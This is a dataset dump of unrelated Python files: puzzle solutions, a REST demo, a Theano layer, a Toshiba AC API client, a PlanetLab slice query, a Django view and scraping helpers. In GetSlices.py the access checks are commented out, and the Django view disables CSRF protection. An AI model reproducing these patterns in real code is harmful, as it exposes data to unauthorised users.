+{"seq_id":"247738403","text":"from math import sqrt\r\n\r\nst = input()\r\nsize = len(st)\r\nsq = int(sqrt(size))\r\nminArea = 2*size\r\nminRows = 0\r\nminCols = 2*size\r\nfor i in range(1, 3*sq):\r\n for j in range(i, 3*sq):\r\n if i*j < size:\r\n continue\r\n else:\r\n if j-i < minCols-minRows:\r\n minArea = i*j\r\n minRows = i\r\n minCols = j\r\n break\r\noutput = ''\r\nfor j in range(minCols):\r\n for i in range(minRows):\r\n val = minCols*i+j\r\n if val < len(st):\r\n output += st[val]\r\n output += ' '\r\nprint(output)","sub_path":"Algorithms/Implementation/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"238304652","text":"import json\nimport requests\n\nURL = 'http://127.0.0.1:8088/todo/api/v1.0'\nTASKID = '1'\n\n\ndef get_requests(url):\n \"\"\"GET请求\"\"\"\n url = url +'/tasks'\n\n headers = {\n 'Content-Type': \"application/json\",\n 'Accept-Charset': \"utf-8\",\n }\n\n response = requests.request(\"GET\", url, headers=headers)\n print(response.text)\n\ndef post_requests(url):\n \"\"\"POST请求\"\"\"\n url = url + '/tasks'\n payload = {\n \"description\": \"python for data analysis\",\n \"done\": False,\n \"title\": \"Read a book\"\n }\n\n headers = {\n 'Content-Type': \"application/json\",\n 'Accept-Charset': \"utf-8\",\n }\n\n response = requests.request(\"POST\", url,data = json.dumps(payload), headers=headers)\n print(response.text)\n\ndef getone_requests(url,id):\n \"\"\"GET请求\"\"\"\n url = url + '/tasks/' + id\n\n headers = {\n 'Content-Type': \"application/json\",\n 'Accept-Charset': \"utf-8\",\n }\n\n response = requests.request(\"GET\", url, headers=headers)\n print(response.text)\n\ndef put_requests(url,id):\n \"\"\"PUT请求\"\"\"\n url = url + '/tasks/' + id\n payload = {\n \"description\": \"data warnging with pandas\",\n \"done\": True,\n \"title\": \"Ipython\"\n }\n\n headers = {\n 'Content-Type': \"application/json\",\n 'Accept-Charset': \"utf-8\",\n }\n\n response = requests.request(\"PUT\", url, data=json.dumps(payload), headers=headers)\n print(response.text)\n\ndef delete_requests(url,id):\n \"\"\"DELETE请求\"\"\"\n url = url + '/tasks/' + id\n headers = {\n 'Content-Type': \"application/json\",\n 'Accept-Charset': \"utf-8\",\n }\n\n response = requests.request(\"DELETE\", url, headers=headers)\n print(response.text)\n\nif __name__ == '__main__':\n #get_requests(URL)\n post_requests(URL)\n #getone_requests(URL, TASKID)\n #put_requests(URL, TASKID)\n #delete_requests(URL, TASKID)\n","sub_path":"apidemo.py","file_name":"apidemo.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"439042495","text":"import theano\nimport theano.tensor as T\nimport numpy as np\nimport numpy.random as rng\n\nclass HiddenLayer: \n\n def __init__(self, num_in, num_out, W, b, activation = None, batch_norm = False): \n\n self.activation = activation\n self.batch_norm = batch_norm\n\n self.residual = (num_in == num_out)\n\n self.W = W\n self.b = b\n\n def output(self, input_raw):\n\n input = input_raw\n\n lin_output = T.dot(input, self.W) + self.b\n\n if self.batch_norm:\n lin_output = (lin_output - T.mean(lin_output, axis = 0, keepdims = True)) / (1.0 + T.std(lin_output, axis = 0, keepdims = True))\n lin_output += self.b\n\n self.out_store = lin_output\n\n if self.activation == None: \n activation = lambda x: x\n elif self.activation == \"relu\": \n activation = lambda x: T.maximum(0.0, x)\n elif self.activation == \"exp\": \n activation = lambda x: T.exp(x)\n elif self.activation == \"tanh\":\n activation = lambda x: T.tanh(x)\n elif self.activation == 'softplus':\n activation = lambda x: T.nnet.softplus(x)\n else: \n raise Exception(\"Activation not found\")\n\n out = activation(lin_output)\n\n return out\n\n\n\n\n","sub_path":"lib/HiddenLayer.py","file_name":"HiddenLayer.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"622648125","text":"# Copyright 2021 Kamil Sroka\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport httpx\nfrom dataclasses import dataclass\n\n@dataclass\nclass ToshibaAcClientInfo:\n device_id: str\n sas_token: str\n\n@dataclass\nclass ToshibaAcDeviceInfo:\n ac_id: str\n ac_unique_id: str\n ac_name: str\n\nclass ToshibaAcHttpApi:\n BASE_URL = 'https://toshibamobileservice.azurewebsites.net'\n LOGIN_PATH = '/api/Consumer/Login'\n REGISTER_PATH = '/api/Consumer/RegisterMobileDevice'\n AC_MAPPING_PATH = '/api/AC/GetConsumerACMapping'\n STATUS_PATH = '/api/AC/GetCurrentACState'\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.access_token = None\n self.access_token_type = None\n self.consumer_id = None\n\n async def request_api(self, path, get=None, post=None, headers=None):\n if not headers:\n headers = {}\n headers['Content-Type'] = 'application/json'\n headers['Authorization'] = self.access_token_type + ' ' + self.access_token\n\n url = self.BASE_URL + path\n\n async with httpx.AsyncClient() as client:\n if post:\n res = await client.post(url, params=get, json=post, headers=headers)\n else:\n res = await client.get(url, params=get, headers=headers)\n\n return res.json()['ResObj']\n\n async def connect(self):\n headers = {'Content-Type': 'application/json'}\n post = {'Username': self.username, 'Password': self.password}\n\n res = await self.request_api(self.LOGIN_PATH, post=post, headers=headers)\n\n self.access_token = res['access_token']\n self.access_token_type = res['token_type']\n self.consumer_id = res['consumerId']\n\n async def get_devices(self):\n get = {\n 'consumerId': self.consumer_id\n }\n\n res = await self.request_api(self.AC_MAPPING_PATH, get=get)\n\n devices = []\n\n for group in res:\n for device in group['ACList']:\n devices.append(ToshibaAcDeviceInfo(device['Id'], device['DeviceUniqueId'], device['Name']))\n\n return devices\n\n async def get_device_state(self, ac_unique_id):\n get = {\n \"ACId\": ac_unique_id,\n }\n\n res = await self.request_api(self.STATUS_PATH, get=get)\n\n return res['ACStateData']\n\n\n async def register_client(self):\n post = {\n 'DeviceID': self.username + '_3e6e4eb5f0e5aa46',\n 'DeviceType': '1',\n 'Username': self.username\n }\n\n res = await self.request_api(self.REGISTER_PATH, post=post)\n\n return ToshibaAcClientInfo(res['DeviceId'], res['SasToken'])\n","sub_path":"toshiba_ac/http_api.py","file_name":"http_api.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"386740064","text":"from PLC.Method import Method\nfrom PLC.Parameter import Parameter, Mixed\nfrom PLC.Filter import Filter\nfrom PLC.Auth import Auth\nfrom PLC.Persons import Person, Persons\nfrom PLC.Nodes import Nodes\nfrom PLC.Sites import Site, Sites\nfrom PLC.Slices import Slice, Slices\n\nclass GetSlices(Method):\n \"\"\"\n Returns an array of structs containing details about slices. If\n slice_filter is specified and is an array of slice identifiers or\n slice names, or a struct of slice attributes, only slices matching\n the filter will be returned. If return_fields is specified, only the\n specified details will be returned.\n\n Users may only query slices of which they are members. PIs may\n query any of the slices at their sites. Admins and nodes may query\n any slice. If a slice that cannot be queried is specified in\n slice_filter, details about that slice will not be returned.\n \"\"\"\n\n roles = ['admin', 'pi', 'user', 'node']\n\n accepts = [\n Auth(),\n Mixed([Mixed(Slice.fields['slice_id'],\n Slice.fields['name'])],\n Parameter(str,\"name\"),\n Parameter(int,\"slice_id\"),\n Filter(Slice.fields)),\n Parameter([str], \"List of fields to return\", nullok = True)\n ]\n\n returns = [Slice.fields]\n\n def call(self, auth, slice_filter = None, return_fields = None):\n # If we are not admin, make sure to return only viewable\n # slices.\n# if isinstance(self.caller, Person) and \\\n# 'admin' not in self.caller['roles']:\n# # Get slices that we are able to view\n# valid_slice_ids = self.caller['slice_ids']\n# # pis can view all slices at their site\n# if 'pi' in self.caller['roles'] and self.caller['site_ids']:\n# sites = Sites(self.api, self.caller['site_ids'])\n# for site in sites:\n# valid_slice_ids += site['slice_ids']\n# # techs can view all slices on the nodes at their site\n# if 'tech' in self.caller['roles'] and self.caller['site_ids']:\n# nodes = Nodes(self.api, {'site_id': self.caller['site_ids']}, ['site_id', 'slice_ids'])\n# for node in nodes:\n# valid_slice_ids.extend(node['slice_ids'])\n#\n# if not valid_slice_ids:\n# return []\n#\n# if slice_filter is None:\n# slice_filter = valid_slice_ids\n\n # Must query at least slice_id (see below)\n if return_fields is not None and 'slice_id' not in return_fields:\n return_fields.append('slice_id')\n added_fields = True\n else:\n added_fields = False\n\n slices = Slices(self.api, slice_filter, return_fields)\n\n # Filter out slices that are not viewable\n# if isinstance(self.caller, Person) and \\\n# 'admin' not in self.caller['roles']:\n# slices = [slice for slice in slices if slice['slice_id'] in valid_slice_ids]\n\n # Remove slice_id if not specified\n if added_fields:\n for slice in slices:\n if 'slice_id' in slice:\n del slice['slice_id']\n\n return slices\n","sub_path":"PLC/Methods/GetSlices.py","file_name":"GetSlices.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"29210347","text":"from Vector import Vector\nimport os\nimport random\nimport shelve\n\nclass PointsInShortStrings:\n def __init__(self, db_filename, window_size=20, character_map={}):\n self.db_filename = db_filename\n try:\n self.string_count = self.getValue('__string_count')\n self.window_size = self.getValue('__window_size')\n self.character_map = self.getValue('__character_map')\n self.category_count = self.getValue('__category_count')\n except:\n db = shelve.open(self.db_filename, 'n')\n db.close()\n self.setValues([\n ['__string_count', 0],\n ['__window_size', window_size],\n ['__character_map', character_map]\n ])\n self.character_type_count = max(self.character_map.values())\n self.vector_size = (2 * self.window_size + 1) * self.character_type_count\n\n def setValue(self, key, value):\n with shelve.open(self.db_filename, 'w') as db:\n db[key] = value\n\n def setValues(self, data):\n with shelve.open(self.db_filename, 'w') as db:\n for [key, value] in data:\n db[key] = value\n\n def getValue(self, key):\n with shelve.open(self.db_filename, 'r') as db:\n return db[key]\n\n def addString(self, value, points):\n next_id = self.getValue('__string_count')\n self.setValues([\n [str(next_id), {\"text\": value, \"points\": points}],\n [\"__string_count\", next_id + 1]\n ])\n\n def getRandomDataPoint(self, category_number):\n result = Vector(self.vector_size)\n random_file = self.getValue(str(random.randrange(0, self.string_count)))\n file_size = len(random_file['text'])\n if category_number == 0:\n while random_position not in random_file['points']:\n random_position = random.randrange(0, file_size)\n start_point = max(0, random_position - window_size)\n first_coordinate = window_size - (random_position - start_point)\n else:\n start_point = max(0, random_file['points'][category_number - 1] - window_size)\n first_coordinate = window_size - (random_file['points'][category_number - 1] - start_point)\n end_point = start_point + len(random_file['text'])\n context = random_file['text'][start_point:end_point]\n for char in context:\n result[first_coordinate * self.character_type_count + self.character_map.get(char, 0)] = 1\n first_coordinate += 1\n return result\n\n","sub_path":"PointsInShortStrings.py","file_name":"PointsInShortStrings.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"105023074","text":"x = input()\nupper = 0\nlower = 0\nfor i in x:\n if i.isupper() == True:\n upper = upper + 1\n elif i.isalpha() == True:\n lower = lower + 1\n\nprint(\"UPPER \", upper)\nprint(\"LOWER \", lower)","sub_path":"q014.py","file_name":"q014.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"356873724","text":"def bfs():\n if len(queue) == 0:\n return\n\n current = queue.pop(0)\n for house in adjHouses[current]:\n if not visited[house-1]:\n visited[house-1] = True\n distMap[house] = [distMap[current][0]+1, current]\n queue.append(house)\n bfs()\n\n\n\n\ninData = input().split()\n\nnumHouses = int(inData[0])\nnumRoads = int(inData[1])\nhouseA = int(inData[2])\nhouseB = int(inData[3])\nadjHouses = {}\ndistMap = {}\n\nfor i in range(numHouses):\n adjHouses[i+1] = []\n distMap[i+1] = []\n \nfor i in range(numRoads):\n road = input().split()\n roadOne = int(road[0])\n roadTwo = int(road[1])\n adjHouses[roadOne].append(roadTwo)\n adjHouses[roadTwo].append(roadOne)\n \nqueue = [houseA]\nvisited = [False for i in range(numHouses)]\nvisited[houseA-1] = True\ndistMap[houseA] = [0, 0]\n\nbfs()\n\n\nif visited[houseB-1]:\n path = [houseB]\n while path[-1] != 0:\n path.append(distMap[path[-1]][1])\n path.pop()\n print(\"GO ALBERT\")\n print(path)\nelse:\n print(\"NO ALBERT\")","sub_path":"Problem Sets/old Set 2/dfsbfs/bfsrecursive.py","file_name":"bfsrecursive.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"21798670","text":"# -*- coding = utf - 8 -*-\r\n#@Time : 2020/12/15 16:28\r\n#@Author : sunzy\r\n#@File : LFSR.py\r\n\r\ndef lfsr(inti, top):\r\n sum = 0\r\n inti2 = \"0\"*len(inti)\r\n inti2 = list(inti2) # 初始化出一个与原始序列等长的列表,便于后面的计算\r\n inti1 = ''\r\n for i in range(len(inti)):\r\n if top[i] == \"1\":\r\n sum += int(inti[i]) # 计算本原多项式中1的个数\r\n sum = sum % 2 # 计算出第一位的值\r\n for i in range(len(inti)): # 实现左移\r\n if i == 0:\r\n inti2[i] = str(sum)\r\n else:\r\n inti2[i] = inti[i - 1]\r\n inti1 = inti1.join(inti2) # 将数组转成字符串\r\n return inti1\r\n\r\ndef main():\r\n inti_str = str(input(\"请输入初始化序列:\"))\r\n inti_str_backup = inti_str # 备份初始化序列,用于后面的比较\r\n top = str(input(\"请输入本原多项式:\"))\r\n top = top[::-1]\r\n for i in range(2 ** len(inti_str) + 1):\r\n if inti_str_backup == inti_str and i != 0 and i == 2 ** len(inti_str) - 1:\r\n print(\"第{0}次\".format(i), inti_str_backup)\r\n print(\"是本原多项式且周期是\" + str(i))\r\n break\r\n elif inti_str_backup == inti_str and i != 0 and i != 2 ** len(inti_str) - 1:\r\n print(\"第{0}次\".format(i), inti_str_backup)\r\n print(\"不是本原多项式且周期是\" + str(i))\r\n break\r\n print(\"第{0}次\".format(i), inti_str_backup)\r\n inti_str_backup = lfsr(inti_str_backup, top)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n'''\r\nlst = 011100010100100101\r\nkey = 011100010100100101\r\n本原多项式,周期为2^18-1=262143\r\n\r\nkey = 1000100000000101\r\n\r\nkey = 1010100000000001 \r\n\r\nkey = 10000000000000100\r\nkey = 10000000000000000100\r\nlst = 111\r\nkey = 101\r\n本原多项式,周期为2^3-1=7\r\n\r\nlst = 1111\r\nkey = 1111\r\n非本原多项式,周期为5 \r\n'''\r\n# 1010100000000001","sub_path":"密码学实验/序列密码/LFSR.py","file_name":"LFSR.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"462935442","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n@csrf_exempt\ndef index(request):\n if request.method == 'POST':\n nome = request.POST.get('name', u'não tem nome')\n return HttpResponse(u'O nome é %s' % nome)\n else:\n form = \"\"\"\n <form action='.' method='post'>\n <input type='text' name='name' maxlength='100' />\n <button type='submit'>Enviar</button>\n </form>\n \"\"\"\n return HttpResponse(form)\n\n\ndef detail(request, username):\n return HttpResponse(u'O nome de usuário é: %s' % username)\n","sub_path":"aula3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"364224799","text":"'''\nmodels.py\n\nCreated by \n\nname: Federico Marcuzzi\ne-mail: federico.marcuzzi@unive.it\n\ndate 20/02/2020\n'''\n\nimport numpy as np\n\nfrom collections import Counter\nfrom sklearn import tree\n\nfrom sklearn.base import BaseEstimator\nfrom sklearn.exceptions import NotFittedError\nfrom sklearn.model_selection import train_test_split\n\n\n# tree wrapper.\nclass TreeWrapper():\n\tdef __init__(self):\n\t\tself.node_count = 0\n\t\tself.children_left = []\n\t\tself.children_right = []\n\t\tself.feature = []\n\t\tself.threshold = []\n\t\tself.value = []\n\n# this class manages the attributes and methods of trained trees in a projection of the original dataset.\nclass ProjectedDecisionTreeClassifier():\n\tdef __init__(self, criterion='gini', splitter='best', max_depth=None, min_samples_split=2, min_samples_leaf=1, min_weight_fraction_leaf=0.0, max_features=None, random_state=None, max_leaf_nodes=None, min_impurity_decrease=0.0, min_impurity_split=None, class_weight=None, presort=False):\n\t\tself.tree_ = TreeWrapper()\n\t\tself.n_feat = 0\n\t\tself.n_features_ = 0\n\t\tself.feature_importances_ = []\n\t\tself.albero = tree.DecisionTreeClassifier(criterion, splitter, max_depth, min_samples_split, min_samples_leaf, min_weight_fraction_leaf, max_features, random_state, max_leaf_nodes, min_impurity_decrease, min_impurity_split, class_weight, presort)\n\n\tdef fit_aux(self):\n\t\tself.n_features_ = self.albero.n_features_\n\t\tself.feature_importances_build_ = self.albero.feature_importances_\n\n\t\tself.tree_.node_count = self.albero.tree_.node_count\n\n\t\tself.tree_.children_left = self.albero.tree_.children_left\n\t\tself.tree_.children_right = self.albero.tree_.children_right\n\n\t\tself.tree_.feature = np.asarray([(lambda x: self.idx[x] if x >=0 else -2)(f) for f in self.albero.tree_.feature])\n\t\tself.tree_.threshold = self.albero.tree_.threshold\n\t\tself.tree_.value = self.albero.tree_.value\n\n\t\tself.feature_importances_ = np.zeros((self.n_feat, ))\n\n\t\tfor idx_f,imp_f in zip(self.idx,self.feature_importances_build_):\n\t\t\tself.feature_importances_[idx_f] = imp_f\n\n\tdef fit(self,X,y,idx):\n\t\t_, self.n_feat = np.shape(X)\n\t\tself.idx = np.copy(idx)\n\t\tself.idx.sort()\n\t\tself.albero.fit(X[:,self.idx],y)\n\t\tself.fit_aux()\n\n\tdef predict(self,X):\n\t\treturn self.albero.predict(X[:,self.idx])\n\n\tdef score(self,X,y):\n\t\treturn self.albero.score(X[:,self.idx],y)\n\n\tdef decision_path(self,X,check_input=True):\n\t\treturn self.albero.decision_path(X[:, self.idx],check_input)\n\n# this class manages the attributes and methods of a forest with trees trained on a projection of the original dataset.\nclass ProjectedForest(BaseEstimator):\n\tdef __init__(self):\n\t\tself.forest = []\n\t\tself.index = -1\n\t\tself.iter = []\n\n\tdef check_fit(self):\n\t\tif len(self.forest) == 0:\n\t\t\traise NotFittedError('This RandomForestClassifier instance is not fitted yet. Call \\'fit\\' with appropriate arguments before using this method.')\n\n\tdef __iter__(self):\n\t\tself.check_fit()\n\t\tself.iter.append(0)\n\t\tself.index += 1\n\t\treturn self\n\n\tdef __next__(self):\n\t\tself.check_fit()\n\t\tif self.iter[self.index] < self.n_trees:\n\t\t\tself.iter[self.index] += 1\n\t\t\treturn self.forest[self.iter[self.index] - 1]\n\t\telse:\n\t\t\tdel self.iter[self.index]\n\t\t\tself.index -= 1\n\t\t\traise StopIteration\n\n\tdef fit(self,X,y):\n\t\tself.max_label = Counter(y).most_common()[0][0]\n\n\tdef predict(self,X):\n\t\tself.check_fit()\n\t\tpredict = np.sum([tr.predict(X) for tr in self.forest],axis=0)\n\n\t\tif self.n_trees % 2 == 0:\n\t\t\tpredict[predict==0] = self.max_label\n\n\t\tpredict[predict<0] = -1\n\t\tpredict[predict>0] = 1\n\t\treturn predict\n\n\tdef score(self,X,y):\n\t\treturn np.sum(self.predict(X)==y) / len(y)\n\n# this class is the implementation of our robust FPF ensemble method.\nclass FeaturePartitionedForest(ProjectedForest):\n\tdef __init__(self,b,r=10,min_acc=None,random_state=None,max_leaf_nodes=None): \n\t\tsuper().__init__()\n\t\tself.forest = []\n\t\tself.b = b\t\n\t\tself.r = r\n\t\tself.min_acc = min_acc\n\t\tself.random_state = random_state\n\t\tself.max_leaf_nodes = max_leaf_nodes\n\t\tnp.random.seed(seed=random_state)\n\n\tdef fit(self,X,y,X_val=None,y_val=None):\n\t\tsuper().fit(X,y)\n\t\tn_ist, n_feat = np.shape(X)\n\t\tidx_f = np.arange(n_feat)\n\t\tmin_num_tree = 2 * self.b + 1\n\n\t\tif self.min_acc == None:\n\t\t\tself.min_acc = Counter(y).most_common()[0][1] / n_ist\n\n\t\tif X_val == None:\n\t\t\tX_val = X\n\t\t\ty_val = y\n\n\t\tself.forest_counter = 0\n\t\t# for each round 'r' create a sub-forest of '2b + 1' trees.\n\t\tfor _ in range(self.r):\n\t\t\tforest = []\n\t\t\tidx_f = np.copy(idx_f)\n\t\t\t# shuffles feature indexes.\n\t\t\tnp.random.shuffle(idx_f)\n\t\t\t# performs robust partitioning: split the feature sets into '2b + 1' partitions.\n\t\t\tslice_idx = np.array_split(idx_f, min_num_tree)\n\n\t\t\t# for each partition trains a decision tree.\n\t\t\tfor idx in slice_idx:\n\t\t\t\tclf = ProjectedDecisionTreeClassifier(random_state=self.random_state,max_leaf_nodes=self.max_leaf_nodes)\n\t\t\t\tclf.fit(X,y,idx)\n\n\t\t\t\t# verify that the tree contains at least one features.\n\t\t\t\tif len(clf.tree_.feature) > 1:\n\t\t\t\t\tforest.append(clf)\n\n\t\t\t# verifies that a sub-forest of '2b + 1' trees has been created.\n\t\t\tif len(forest) >= min_num_tree:\n\t\t\t\tpredict = np.sum([tr.predict(X_val) for tr in forest],axis=0)\n\t\t\t\tpredict[predict<0] = -1\n\t\t\t\tpredict[predict>0] = 1\n\t\t\t\t\n\t\t\t\tacc = np.sum(predict==y_val) / len(y_val)\n\t\t\t\t# given an 'X_val' dataset if the accuracy of the sub-forest is below the majority class percentage, discard the forest.\n\t\t\t\tif acc > self.min_acc:\n\t\t\t\t\tself.forest += forest\n\t\t\t\t\tself.forest_counter += 1\n\n\t\tself.n_trees = len(self.forest)\n\n\t\tprint('t_size: ',min_num_tree,'#frst: ',self.forest_counter,' #tr: ',self.n_trees)\n\t\t# if it does not generate at least one forest it raises an error\n\t\tif self.n_trees < 1:\n\t\t\traise Exception('Error: a robust forest cannot be created with the specified parameters.')\n\n# this class is the implementation of RSM ensemble method.\nclass RandomSubspaceMethod(ProjectedForest):\n\tdef __init__(self,p=.2,n_trees=1,random_state=None,max_leaf_nodes=None): \n\t\tsuper().__init__()\n\t\tself.forest = []\n\t\tself.p = p\t\n\t\tself.n_trees = n_trees\n\t\tself.random_state = random_state\n\t\tself.max_leaf_nodes = max_leaf_nodes\n\t\tnp.random.seed(seed=random_state)\n\n\tdef fit(self,X,y):\n\t\tsuper().fit(X,y)\n\t\t_, n_feat = np.shape(X)\n\t\tidx_f = np.arange(n_feat)\n\t\tft_sb_size = int(self.p * n_feat)\n\n\t\tif ft_sb_size < 1 or ft_sb_size > n_feat:\n\t\t\tprint('Error: parameter \"p\" must be in [0,1].')\n\n\t\tself.forest_counter = 0\n\t\tfor _ in range(self.n_trees):\n\t\t\tidx_f = np.copy(idx_f)\n\t\t\t# shuffles feature indexes.\n\t\t\tnp.random.shuffle(idx_f)\n\t\t\t# performs boostrap sampling.\n\t\t\tslice_idx = idx_f[:ft_sb_size]\n\t\t\t# trains a tree with the features sample\n\t\t\tclf = ProjectedDecisionTreeClassifier(random_state=self.random_state,max_leaf_nodes=self.max_leaf_nodes)\n\t\t\tclf.fit(X,y,slice_idx)\n\n\t\t\t# verify that the tree contains at least one features.\n\t\t\tif len(clf.tree_.feature) > 1:\n\t\t\t\tself.forest.append(clf)","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"566795458","text":"f = open(\"d6.txt\", \"r\")\n#data = f.read().split(\"\\n\\n\")\n\n#length = 0\n#for item in data:\n# s = set(item)\n# if ('\\n' in s):\n# s.remove('\\n')\n# length+=len(s)\n\n#print(length)\nlength = 0\ndata = f.read().split(\"\\n\\n\")\nfor item in data:\n li = item.split(\"\\n\")\n chars = []\n for c in li[0]:\n elem = True\n for i in li:\n if c not in i:\n elem = False\n if elem:\n chars.append(c)\n length+=len(chars)\n","sub_path":"Day 6/d6.py","file_name":"d6.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"346175015","text":"# -*- coding: utf-8 -*-\n__author__ = 'lenovo'\n\nfrom django.forms.models import ModelForm\nfrom django.forms.widgets import TextInput, Textarea\nfrom .models import News\n\nclass NewsForm(ModelForm):\n class Meta:\n model = News\n fields = ['title', 'category', 'content']\n\n widgets = {\n 'title' : TextInput(attrs={'required': 'required', 'type':'text'}),\n 'content': Textarea(attrs={'type' : 'text'}),\n }\n def __init__(self, *args, **kwargs):\n super(NewsForm, self).__init__(*args, **kwargs)\n self.fields['title'].error_messages = {'required': '标题不能为空',\n 'invalid': u'内容格式不正确'}\n self.fields['category'].error_messages = {'required': '标签不能为空',\n 'invalid': u'内容格式不正确'}\n self.fields['content'].error_messages = {'invalid': u'内容格式不正确'}","sub_path":"news/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"385940673","text":"import codecs\nimport logging\nimport os\nfrom pathlib import Path\n\nfrom bs4 import BeautifulSoup\n\nimport doc_curation.md\nfrom curation_utils import file_helper\nfrom doc_curation.md.file import MdFile\nfrom indic_transliteration import sanscript\n\n\ndef get_text(src_file):\n with codecs.open(src_file, \"r\", 'utf-8') as file_in:\n contents = file_in.read()\n soup = BeautifulSoup(contents, 'lxml')\n content_elements = soup.select(\"pre#content\")\n if len(content_elements) == 0:\n logging.warning(\"No stotra elements found in %s - Returning empty string\", src_file)\n return \"\"\n texts = [content_element.text for content_element in content_elements]\n text = \"\\n\\n\".join(texts)\n text = doc_curation.md.markdownify_plain_text(text)\n return text\n\n\ndef get_metadata(src_file):\n metadata = {}\n with codecs.open(src_file, \"r\", 'utf-8') as file_in:\n try:\n contents = file_in.read()\n except UnicodeDecodeError:\n logging.warning(\"Invalid character in file %s\", src_file)\n return {}\n soup = BeautifulSoup(contents, 'lxml')\n info_elements = soup.select(\"pre.inf\")\n if len(info_elements) == 0:\n logging.warning(\"No metadata found for %s\", src_file)\n return {}\n info_text = info_elements[0].text\n info_text = info_text.replace(\"% \", \"\")\n for item in info_text.split(\"\\n\"):\n if \":\" in item:\n (key, value) = item.split(\":\", maxsplit=1)\n metadata[key.strip()] = value.strip()\n return metadata\n\n\ndef dump_markdown(src_file, dest_file):\n logging.info(\"Processing %s to %s\", src_file, dest_file)\n metadata = get_metadata(src_file=src_file)\n text = get_text(src_file=src_file)\n metadata[\"title\"] = sanscript.transliterate(data=metadata[\"itxtitle\"], _from=sanscript.OPTITRANS, _to=sanscript.DEVANAGARI)\n md_file = MdFile(file_path=dest_file, frontmatter_type=MdFile.TOML)\n md_file.dump_to_file(metadata=metadata, content=text, dry_run=False)\n\n\ndef markdownify_all(src_dir, dest_dir):\n file_paths = sorted(Path(src_dir).glob(\"**/doc_*/*.html\"))\n for src_path in file_paths:\n metadata = get_metadata(src_file=src_path)\n if metadata == {}:\n logging.warning(\"No metadata found for %s\", src_path)\n continue\n filename = metadata[\"itxtitle\"].strip() + \".md\"\n dest_path = os.path.join(\n os.path.dirname(str(src_path).replace(src_dir, dest_dir)), \n filename)\n dest_path = file_helper.clean_file_path(dest_path)\n dump_markdown(src_file=src_path, dest_file=dest_path)","sub_path":"doc_curation/scraping/misc_sites/sanskrit_documents.py","file_name":"sanskrit_documents.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"490420864","text":"# -*- mode: python; coding: utf-8 -*-\n# Copyright 2018 the HERA Collaboration\n# Licensed under the 2-clause BSD license.\n\n\"\"\"Functions to handle various cm table \"health\" checks.\n\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nimport warnings\nfrom . import mc, cm_utils\nfrom . import part_connect as PC\nfrom . import cm_revisions\n\n\nclass RevisionError(Exception):\n def __init__(self, hpn):\n # Call the base class constructor with the parameters it needs\n message = \"Multiple revisions found on {}\".format(hpn)\n super(RevisionError, self).__init__(message)\n\n\ndef check_for_overlap(interval_i, interval_j):\n if interval_j[0] <= interval_i[0]:\n if interval_j[1] > interval_i[0]:\n return True\n elif interval_j[0] <= interval_i[1]:\n return True\n return False\n\n\nclass Connections:\n def __init__(self, session=None):\n if session is None:\n db = mc.connect_to_mc_db(None)\n self.session = db.sessionmaker()\n else:\n self.session = session\n self.conndict = None\n\n def ensure_conndict(self):\n \"\"\"\n If not already set, writes the class variables:\n conndict - dictionary - conndict[k] = [[start, stop], []...]\n Dictionary of connections keyed as:\n upstream_part:rev:output_port:downstream_part:rev:input_port\n with the items being the start/stop times of that connection.\n So all entries will have at least one pair.\n multiple - set - {key1, ...}\n Set of connections keys with more than one pair, so there is\n the potential for conflicting times.\n num_connections:\n Integer of the total number of connections in database.\n \"\"\"\n if self.conndict is not None:\n return\n self.conndict = {}\n self.multiples = set()\n self.num_connections = 0\n for conn in self.session.query(PC.Connections).all():\n self.num_connections += 1\n connection = [conn.upstream_part, conn.up_part_rev, conn.upstream_output_port,\n conn.downstream_part, conn.down_part_rev, conn.downstream_input_port]\n connection = [x.lower() for x in connection]\n k = ':'.join(connection)\n if k in self.conndict.keys():\n self.multiples.add(k) # only add to multiples if there is more than one.\n 